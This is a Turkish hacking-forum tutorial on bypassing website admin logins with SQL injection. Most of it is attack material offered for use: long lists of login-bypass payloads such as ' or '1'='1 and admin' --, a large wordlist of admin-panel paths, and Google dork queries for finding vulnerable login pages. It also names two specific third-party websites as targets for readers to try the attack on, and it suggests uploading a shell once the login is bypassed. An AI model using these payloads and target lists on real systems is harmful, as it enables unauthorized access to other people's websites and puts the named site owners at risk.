SQL Enjeksiyon Admin Authentication Login ByPass Konusu

1. Sql Enjeksiyon Admin Authentication Login ByPass Geniş Resimli Videolu Anlatım
2.  
3. Merhaba arkadaşlar ben KingSkrupellos. Forumda sevdiğim bir kardeşimin isteği üzerine yazdığım ve birçok kaynaktan alarak düzenlediğim bir dökümanı sizlerle paylaşmak istiyorum.Bu yöntemin bir diğer ismi Sql Injection Authentication Bypass’dır. Bugün size Admin Login Bypass yönteminde kullanılan admin/login.php yada SQL Injection Saldırısı veya Veritabanı saldırısı olarak ta bilinen ve halen birçok site için geçerli olan yönetim panelden SQL Saldırısı yani Login Bypass kodlarını sizlerle paylaşacağım. Genelde Windows sunucularında çalışan Microsoft web uygulamalarının (ASP, ASP.NET) veritabanlarında karşılaşılan bir saldırı çeşididir. Microsoft Access ve MsSQL veritabanı kullanan sistemlerde bu saldırı yöntemi çokça yapılmaktadır.PHP tabanlı MySQL veritabanı kullanan siteler içinde geçerlidir bu saldırı. Tabi PHP yapısı son zamanlarda özellikle CMS üzerinde yapılan yoğun çalışmalar ile SQL Injection saldırıları minimuma indirilmiştir. Ek olarak Kullanıcının şifre bilgisi MD5 olarak kriptolandığı içinde bu saldırı çeşidi PHP sitelere pek yapılmamaktadır.SQL Injection Saldırısının en basit yöntemi olan Login Bypass, Kullanıcı adı ve Şifre kısmına Bypass edici meta kodlarını yazarak panele giriş yapabilmektir. Bu saldırıyı deneme yanılma yolu ile yapabilirsiniz aşağıdaki kodları kullanarak. Yada bazen oluyor ki kullanıcının ismi admin ve şifresi ‘ or ‘1’=’1 ‘nide biz sql encekte ederek yönetici paneline girmiş oluyoruz. Tabi illa yöneticinin ismi admin olacak diye bir şey yok, ya bunu sql encekte ederek öğrenebiliriz yada site üzerinde biraz gezinti yaparak en üst düzey yöneticinin kim olduğunu da görebiliriz.
4.  
5. Konunu Tamamını Görmek için Lütfen Akıllı Uslu Yorum Atınız - Emeğe Saygı Lütfen :D
6.  
7. [hide]
8. Ayrıca konuya uygun bulduğum videolarıda sizinle paylaşıyım.
9. [code]http://www.youtube.com/watch?v=ap2aNpO9GJs
10. http://www.youtube.com/watch?v=OYpMMaSinlY
11. http://www.youtube.com/watch?v=TUMYNBKwOGs
12. http://www.youtube.com/watch?v=wDRCTy8tPUA
13. http://www.youtube.com/watch?v=J8FOoTcnagM
14. http://www.youtube.com/watch?v=16y2gvq__f0
15. http://www.youtube.com/watch?v=pr8h-VUDMhE
16. http://www.youtube.com/watch?v=QTUIqJUkXqY
17. http://www.youtube.com/watch?v=3R0ENxHmRdM
18. http://www.youtube.com/watch?v=HI7Ti9SU8es[/code]
19. KingSkrupellos Cyberizm.Org
20. ASP Siteler için SQL Injection Login Bypass
21. [code]
22. ' or '1'='1
23. ' or 'x'='x
24. ' or 0=0 --
25. " or 0=0 --
26. or 0=0 --
27. ' or 0=0 #
28. " or 0=0 #
29. or 0=0 #
30. ' or 'x'='x
31. " or "x"="x
32. ') or ('x'='x
33. ' or 1=1--
34. " or 1=1--
35. or 1=1--
36. ' or a=a--
37. " or "a"="a
38. ') or ('a'='a
39. ") or ("a"="a
40. hi" or "a"="a
41. hi" or 1=1 --
42. hi' or 1=1 --
43. 'or'1=1'
44. ==
45. and 1=1--
46. and 1=1
47. ' or 'one'='one--
48. ' or 'one'='one
49. ' and 'one'='one
50. ' and 'one'='one--
51. 1') and '1'='1--
52. admin' --
53. admin' #
54. admin'/*
55. or 1=1--
56. or 1=1#
57. or 1=1/*
58. ) or '1'='1--
59. ) or ('1'='1--
60. ' or '1'='1
61. ' or 'x'='x
62. ' or 0=0 --
63. " or 0=0 --
64. or 0=0 --
65. ' or 0=0 #
66. " or 0=0 #
67. or 0=0 #
68. ' or 'x'='x
69. " or "x"="x
70. ') or ('x'='x
71. ' or 1=1--
72. " or 1=1--
73. or 1=1--
74. ' or a=a--
75. " or "a"="a
76. ') or ('a'='a
77. ") or ("a"="a
78. hi" or "a"="a
79. hi" or 1=1 --
80. hi' or 1=1 --
81. 'or'1=1'
82. or 1=1
83. or 1=1--
84. or 1=1#
85. or 1=1/*
86. admin' --
87. admin' #
88. admin'/*
89. admin' or '1'='1
90. admin' or '1'='1'--
91. admin' or '1'='1'#
92. admin' or '1'='1'/*
93. admin'or 1=1 or ''='
94. admin' or 1=1
95. admin' or 1=1--
96. admin' or 1=1#
97. admin' or 1=1/*
98. admin') or ('1'='1
99. admin') or ('1'='1'--
100. admin') or ('1'='1'#
101. admin') or ('1'='1'/*
102. admin') or '1'='1
103. admin') or '1'='1'--
104. admin') or '1'='1'#
105. admin') or '1'='1'/*
106. admin" --
107. admin" #
108. admin"/*
109. admin" or "1"="1
110. admin" or "1"="1"--
111. admin" or "1"="1"#
112. admin" or "1"="1"/*
113. admin"or 1=1 or ""="
114. admin" or 1=1
115. admin" or 1=1--
116. admin" or 1=1#
117. admin" or 1=1/*
118. admin") or ("1"="1
119. admin") or ("1"="1"--
120. admin") or ("1"="1"#
121. admin") or ("1"="1"/*
122. admin") or "1"="1
123. admin") or "1"="1"--
124. admin") or "1"="1"#
125. admin") or "1"="1"/*
126. ' or 0=0 --
127. admin
128. ' or '1'='1
129. ' or 1='1
130. 1' or 1=1 -- -
131. ' or '1'='1
132. ' or ' 1=1
133. 1' or 1=1 -- -
134. ' or ' 1=1
135. ' or '1'='1
136. ''Or'='Or''
137. 1'or'1'='1
138. ' or 1=1 or ''='
139. " or 1=1 or ""="
140. ' OR ''='
141. '' OR ''=''
142. 'OR''='
143. hey' or 1=1–
144. ''Or 1 = 1'
145. ' or 1=1--
146. or 1=1--
147. " or 1=1--
148. or 1=1--
149. ' or 'a'='a
150. " or "a"="a
151. ') or ('a'='a
152. hi") or ("a"="a
153. 'hi' or 'x'='x';
154. x' or 1=1 or 'x'='y
155. \x27\x4F\x52 SELECT *
156. \x27\x6F\x72 SELECT *
157. 'or select *
158. admin'--
159. ")) or (("x"))=(("x
160. " or ""+"
161. admin"or 1=1 or ""="
162. admin") or ("1"="1"--[/code]
163. ASP.NET(aspx) Siteler için Login Bypass
164. [code]anything' OR 'x'='x[/code]
165. Ve benim kendim oluşturduğum Administrator Login ByPass yöntemi kodları
166. Bunları yönetici panelini bulup Kullanıcı adı ve Şifreyi bu kodlarla iki kez girmektir. Daha sonra admin panelindesiniz.
167. [code]
168. '-'
169. ' '
170. '&'
171. '^'
172. '*'
173. ' or ''-'
174. ' or '' '
175. ' or ''&'
176. ' or ''^'
177. ' or ''*'
178. "-"
179. " "
180. "&"
181. "^"
182. "*"
183. " or ""-"
184. " or "" "
185. " or ""&"
186. " or ""^"
187. " or ""*"
188. or true--
189. " or true--
190. ' or true--
191. ") or true--
192. ') or true--
193. ' or 'x'='x
194. ') or ('x')=('x
195. ')) or (('x'))=(('x
196. " or "x"="x
197. ") or ("x")=("x
198. ")) or (("x"))=(("x
199. ' OR 'a' = 'a
200. [/code]
201. Kendime ait olup geliştirdiğim Login ByPass yöntemleride var onuda veriyim
202. [code]'-'
203. ' '
204. '&'
205. '^'
206. '*'
207. ' or ''-'
208. ' or '' '
209. ' or ''&'
210. ' or ''^'
211. ' or ''*'
212. "-"
213. " "
214. "&"
215. "^"
216. "*"
217. " or ""-"
218. " or "" "
219. " or ""&"
220. " or ""^"
221. " or ""*"
222. or true--
223. " or true--
224. ' or true--
225. ") or true--
226. ') or true--
227. ' or 'x'='x
228. ') or ('x')=('x
229. ')) or (('x'))=(('x
230. " or "x"="x
231. ") or ("x")=("x
232. ")) or (("x"))=(("x
233. ''Or'='Or''
234. 1'or'1'='1
235. ' or 1=1 or ''='
236. " or 1=1 or ""="
237. ' OR ''='
238. '' OR ''=''
239. 'OR''='
240. hey' or 1=1–
241. ''Or 1 = 1'
242. ' or 1=1--
243. or 1=1--
244. " or 1=1--
245. or 1=1--
246. ' or 'a'='a
247. " or "a"="a
248. ') or ('a'='a
249. hi") or ("a"="a
250. 'hi' or 'x'='x';
251. x' or 1=1 or 'x'='y
252. \x27\x4F\x52 SELECT *
253. \x27\x6F\x72 SELECT *
254. 'or select *
255. admin'--
256. ")) or (("x"))=(("x
257. " or ""+"
258. admin"or 1=1 or ""="
259. admin") or ("1"="1"--[/code]
260. Örnek Admin Panelleri PHP,HTML,ASP VE ASPX kullanan sistemlerde
261. [code]
262. /login/web_manage.asp
263. /login-admin.asp
264. /adminlogin.asp
265. /admin/adminLogin.asp
266. /admin/login.php
267. /admin/login.asp
268. /admin/login.aspx
269. /admin/login.html
270. /admin
271. /yonetim
272. /panel
273. /kontrolpanel
274. /administrator
275. /giris
276. /login
277. /superadmin
278. /controlpanel
279. /yonetici
280. /giris.asp
281. /yonetim.asp
282. /login.asp
283. /yonetici.asp
284. /panel.asp[/code]
285. Not => Dorklar her zaman geliştirilebilir, illa bu dorkları kullanılacak diye bir şey yok.Dorkların önüne inurl : inalltitle : allintext : gibi yazılarla çoğaltabilirsiniz.
286.  
287. [code]Login Dorks: "inurl:DİYE BURAYA İSTEDİĞİMİZ YAZIYORUZ AŞAĞIDAKİLERDEN" where "DİYE BURAYA İSTEDİĞİMİZ YAZIYORUZ AŞAĞIDAKİLERDEN" = aşağıdaki listeden seçebilirsiniz.
288. Mesela şöyle olsun sayın cyberizm üyeleri
289. [code]"inurl:admin.asp"
290.  
291. "inurl:login/admin.asp"
292.  
293. "inurl:admin/login.asp"
294.  
295. "inurl:adminlogin.asp"
296.  
297. "inurl:adminhome.asp"
298.  
299. "inurl:admin_login.asp"
300.  
301. "inurl:administratorlogin.asp"
302.  
303. "inurl:login/administrator.asp"
304.  
305. "inurl:administrator_login.asp"
306. Diğerlerini de siz kendiniz önüne inurl : gibi yazarak çoğaltabilirsiniz.
307. adm
308. admincp
309. admcp
310. cp
311. modcp
312. moderatorcp
313. adminare
314. admins
315. admin1.php
316. admin1.html
317. admin2.php
318. admin2.html
319. yonetim.php
320. yonetim.html
321. yonetici.php
322. yonetici.html
323. ccms/
324. ccms/login.php
325. ccms/index.php
326. maintenance/
327. webmaster/
328. adm/
329. configuration/
330. configure/
331. websvn/
332. admin/
333. admin/account.php
334. admin/account.html
335. admin/index.php
336. admin/index.html
337. admin/login.php
338. admin/login.html
339. admin/home.php
340. admin/controlpanel.html
341. admin/controlpanel.php
342. admin.php
343. admin.html
344. administrator/
345. administrator/index.html
346. administrator/index.php
347. administrator/login.html
348. administrator/login.php
349. administrator/account.html
350. administrator/account.php
351. administrator.php
352. administrator.html
353. login.php
354. login.html
355. modelsearch/login.php
356. moderator.php
357. moderator.html
358. moderator/login.php
359. moderator/login.html
360. moderator/admin.php
361. moderator/admin.html
362. moderator/
363. account.php
364. account.html
365. admincontrol.php
366. admincontrol.html
367. adminpanel.php
368. adminpanel.html
369. admin1.asp
370. admin2.asp
371. yonetim.asp
372. yonetici.asp
373. admin/account.asp
374. admin/index.asp
375. admin/login.asp
376. admin/home.asp
377. admin.asp
378. administrator/index.asp
379. administrator/login.asp
380. administrator/account.asp
381. administrator.asp
382. login.asp
383. modelsearch/login.asp
384. moderator.asp
385. moderator/login.asp
386. moderator/admin.asp
387. account.asp
388. controlpanel.asp
389. admincontrol.asp
390. adminpanel.asp
391. fileadmin/
392. fileadmin.php
393. fileadmin.asp
394. fileadmin.html
395. administration/
396. administration.php
397. administration.html
398. sysadmin.php
399. sysadmin.html
400. phpmyadmin/
401. myadmin/
402. sysadmin.asp
403. sysadmin/
404. ur-admin.asp
405. ur-admin.php
406. ur-admin.html
407. ur-admin/
408. Server.php
409. Server.html
410. Server.asp
411. Server/
412. wp-admin/
413. administr8.php
414. administr8.html
415. administr8/
416. administr8.asp
417. webadmin/
418. webadmin.php
419. webadmin.asp
420. webadmin.html
421. administratie/
422. admins/
423. admins.php
424. admins.asp
425. admins.html
426. administrivia/
427. Database_Administration/
428. WebAdmin/
429. useradmin/
430. sysadmins/
431. admin1/
432. system-administration/
433. administrators/
434. pgadmin/
435. directadmin/
436. staradmin/
437. ServerAdministrator/
438. SysAdmin/
439. administer/
440. LiveUser_Admin/
441. sys-admin/
442. typo3/
443. panel/
444. cpanel/
445. cPanel/
446. cpanel_file/
447. platz_login/
448. rcLogin/
449. blogindex/
450. formslogin/
451. autologin/
452. support_login/
453. meta_login/
454. manuallogin/
455. simpleLogin/
456. loginflat/
457. utility_login/
458. showlogin/
459. memlogin/
460. members/
461. login-redirect/
462. sub-login/
463. wp-login/
464. login1/
465. dir-login/
466. login_db/
467. xlogin/
468. smblogin/
469. customer_login/
470. UserLogin/
471. login-us/
472. acct_login/
473. admin_area/
474. bigadmin/
475. project-admins/
476. phppgadmin/
477. pureadmin/
478. sql-admin/
479. radmind/
480. openvpnadmin/
481. wizmysqladmin/
482. vadmind/
483. ezsqliteadmin/
484. hpwebjetadmin/
485. newsadmin/
486. adminpro/
487. Lotus_Domino_Admin/
488. bbadmin/
489. vmailadmin/
490. Indy_admin/
491. ccp14admin/
492. irc-macadmin/
493. banneradmin/
494. sshadmin/
495. phpldapadmin/
496. macadmin/
497. administratoraccounts/
498. admin4_account/
499. admin4_colon/
500. radmind-1/
501. Super-Admin/
502. AdminTools/
503. cmsadmin/
504. SysAdmin2/
505. globes_admin/
506. cadmins/
507. phpSQLiteAdmin/
508. navSiteAdmin/
509. server_admin_small/
510. logo_sysadmin/
511. server/
512. database_administration/
513. power_user/
514. system_administration/
515. ss_vms_admin_sm/
516. adminarea/
517. bb-admin/
518. adminLogin/
519. panel-administracion/
520. instadmin/
521. memberadmin/
522. administratorlogin/
523. admin/admin.php
524. admin_area/admin.php
525. admin_area/login.php
526. siteadmin/login.php
527. siteadmin/index.php
528. siteadmin/login.html
529. admin/admin.html
530. admin_area/index.php
531. bb-admin/index.php
532. bb-admin/login.php
533. bb-admin/admin.php
534. admin_area/login.html
535. admin_area/index.html
536. admincp/index.asp
537. admincp/login.asp
538. admincp/index.html
539. webadmin/index.html
540. webadmin/admin.html
541. webadmin/login.html
542. admin/admin_login.html
543. admin_login.html
544. panel-administracion/login.html
545. nsw/admin/login.php
546. webadmin/login.php
547. admin/admin_login.php
548. admin_login.php
549. admin_area/admin.html
550. pages/admin/admin-login.php
551. admin/admin-login.php
552. admin-login.php
553. bb-admin/index.html
554. bb-admin/login.html
555. bb-admin/admin.html
556. admin/home.html
557. pages/admin/admin-login.html
558. admin/admin-login.html
559. admin-login.html
560. admin/adminLogin.html
561. adminLogin.html
562. home.html
563. rcjakar/admin/login.php
564. adminarea/index.html
565. adminarea/admin.html
566. webadmin/index.php
567. webadmin/admin.php
568. user.html
569. modelsearch/login.html
570. adminarea/login.html
571. panel-administracion/index.html
572. panel-administracion/admin.html
573. modelsearch/index.html
574. modelsearch/admin.html
575. admincontrol/login.html
576. adm/index.html
577. adm.html
578. user.php
579. panel-administracion/login.php
580. wp-login.php
581. adminLogin.php
582. admin/adminLogin.php
583. home.php
584. adminarea/index.php
585. adminarea/admin.php
586. adminarea/login.php
587. panel-administracion/index.php
588. panel-administracion/admin.php
589. modelsearch/index.php
590. modelsearch/admin.php
591. admincontrol/login.php
592. adm/admloginuser.php
593. admloginuser.php
594. admin2/login.php
595. admin2/index.php
596. adm/index.php
597. adm.php
598. affiliate.php
599. adm_auth.php
600. memberadmin.php
601. administratorlogin.php
602. admin/admin.asp
603. admin_area/admin.asp
604. admin_area/login.asp
605. admin_area/index.asp
606. bb-admin/index.asp
607. bb-admin/login.asp
608. bb-admin/admin.asp
609. pages/admin/admin-login.asp
610. admin/admin-login.asp
611. admin-login.asp
612. user.asp
613. webadmin/index.asp
614. webadmin/admin.asp
615. webadmin/login.asp
616. admin/admin_login.asp
617. admin_login.asp
618. panel-administracion/login.asp
619. adminLogin.asp
620. admin/adminLogin.asp
621. home.asp
622. adminarea/index.asp
623. adminarea/admin.asp
624. adminarea/login.asp
625. panel-administracion/index.asp
626. panel-administracion/admin.asp
627. modelsearch/index.asp
628. modelsearch/admin.asp
629. admincontrol/login.asp
630. adm/admloginuser.asp
631. admloginuser.asp
632. admin2/login.asp
633. admin2/index.asp
634. adm/index.asp
635. adm.asp
636. affiliate.asp
637. adm_auth.asp
638. memberadmin.asp
639. administratorlogin.asp
640. siteadmin/login.asp
641. siteadmin/index.asp
642. ADMIN/
643. paneldecontrol/
644. login/
645. cms/
646. admon/
647. ADMON/
648. administrador/
649. ADMIN/login.php
650. panelc/
651. ADMIN/login.html
652. admin.
653. login.htm
654. login.
655. admin/login.htm
656. admin/home.
657. admin/controlpanel.htm
658. admin/cp.
659. admin/adminLogin.htm
660. admin/admin_login.
661. admin/controlpanel.
662. admin/admin-login.
663. admin-login.
664. admin/account.
665. admin/admin.
666. admin.htm
667. adminitem/
668. adminitem.
669. adminitems/
670. adminitems.
671. administrator/login.
672. administrator.
673. administration.
674. adminlogin.
675. admin_area/admin.
676. admin_area/login.
677. manager/
678. manager.
679. letmein/
680. letmein.
681. superuser/
682. superuser.
683. access/
684. access.
685. sysadm/
686. sysadm.
687. superman/
688. supervisor/
689. panel.
690. control/
691. control.
692. member/
693. member.
694. members.
695. user/
696. user.
697. cp/
698. uvpanel/
699. manage/
700. manage.
701. management/
702. management.
703. signin/
704. signin.
705. log-in/
706. log-in.
707. log_in/
708. log_in.
709. sign_in/
710. sign_in.
711. sign-in/
712. sign-in.
713. users/
714. users.
715. accounts/
716. accounts.
717. bb-admin/login.
718. bb-admin/admin.
719. administrator/account.
720. relogin.htm
721. relogin.html
722. check.
723. relogin.
724. blog/wp-login.
725. user/admin.
726. users/admin.
727. registration/
728. processlogin.
729. checklogin.
730. checkuser.
731. checkadmin.
732. isadmin.
733. authenticate.
734. authentication.
735. auth.
736. authuser.
737. authadmin.
738. cp.
739. modelsearch/login.
740. moderator.
741. controlpanel.
742. admincontrol.
743. adminpanel.
744. fileadmin.
745. sysadmin.
746. admin1.
747. admin1.htm
748. admin2.
749. yonetim.
750. yonetici.
751. ur-admin.
752. Server.
753. administr8.
754. webadmin.
755. admins.
756. adm.
757. admin_login.
758. panel-administracion/login.
759. pages/admin/admin-login.
760. pages/admin/
761. acceso.
762. admincp/login.
763. admincp/
764. admincontrol/
765. affiliate.
766. adm_auth.
767. memberadmin.
768. administratorlogin.
769. modules/admin/
770. administrators.
771. siteadmin/
772. siteadmin.
773. adminsite/
774. kpanel/
775. vorod/
776. vorod.
777. vorud/
778. vorud.
779. adminpanel/
780. PSUser/
781. secure/
782. webmaster.
783. autologin.
784. userlogin.
785. admin_area.
786. cmsadmin.
787. security/
788. usr/
789. root/
790. secret/
791. admin/login.
792. admin/adminLogin.
793. moderator/login.
794. moderator/admin.
795. 0admin/
796. 0manager/
797. aadmin/
798. cgi-bin/login
799. login1
800. login_admin/
801. login_admin
802. login_out/
803. login_out
804. login_user
805. loginerror/
806. loginok/
807. loginsave/
808. loginsuper/
809. loginsuper
810. login
811. logout/
812. logout
813. secrets/
814. super1/
815. super1
816. super_index
817. super_login
818. supermanager
819. superman
820. superuser
821. supervise/
822. supervise/Login
823. super[/code]
824. Bunun yanında güncel dorkları ve exploitleri takip edebileceğiniz iki siteyi öneriyorum.
825. [code]http://www.exploit-db.com/
826. http://www.cxsecurity.com/[/code]
827. İşte Size 2 site hediyem olsun. Bu sitelerde deneyebilirsiniz. Özellikle forumda sevdiğim kardeşime bir armağan olsun ve sizlere de tabiki Cyberizm.Org üyeleri.
828. [code]http://www.sunmarytrust.org/adminlogin.asp
829. http://www.preventivecardiology.in/adminlogin.asp
830. [/code]
831. Bunun yanında Fatcat Sql Injector Tool’u tavsiye ederim. Ayrıntılı bilgiyi bu link üzerinden öğrenebilirsiniz sayın arkadaşlar ve yeni olanlar, alanda zaten uzmanlaşanlar. Ben birşeye karşıyım arkadaş, herşey yeniler için değildir ve biz uzman olanlar içinde lazım oluyor bazen bu toollar yani. Neyse işte programın yada kodun ayrıntılı açıklamasını linkten öğrenebilirsiniz ama ingilizce.
832. [code]http://www.chmag.in/article/mar2013/fatcat-v2-auto-sql-injector[/code]
833. Ayrıca bu sitede İngilizce olarak resimli benim dediğime benzer resimli olarak anlatılmıştır. Takip edebilirsiniz.
834. [code]http://www.kanishkashowto.com/2013/08/09/website-hacking-login-bypass-using-sql-injection-2/[/code]
835. Sql Enjeksiyon ile Login ByPass yapılışı
836. [code]http://www.sechow.com/bricks/docs/login-1.html[/code]
837. Ayrıca güvendiğim sitelerden birisi olan bu siteden BurpSuite programıyla SQL enjekte edip login bypass olup admin paneline dalıp Shell yükleyebilirsiniz.
838. [code]https://www.architectingsecurity.com/2012/04/23/pentesting-of-authentication-bypass-via-sql-injection-with-burpsuite-intruder/[/code]
839. Bu linklerden de nasıl sql enjekte edilipde login bypass yaptığımız görelim.
840. [code]http://priyahackingarticles.blogspot.com.tr/2011/03/bypass-website-login-by-sql-injection.html[/code]
841. Not => Çok uzun oldu farkındayım ama olması gerekiyor. Neyse bu kadar anlatım yeter. Yazasıya kadar ellerim yoruldu. Hatta kollarıma ağrı girdi. Üzerine ekleme yapabilirim. Anlamayan olursa pm’le yada konu altında anlamaydığı yeri sorabilir. KingSkrupellos Cyberizm.Org.Lütfen Emeğe Saygı. Hadi görüşürüz bir sonraki makalede.[/hide]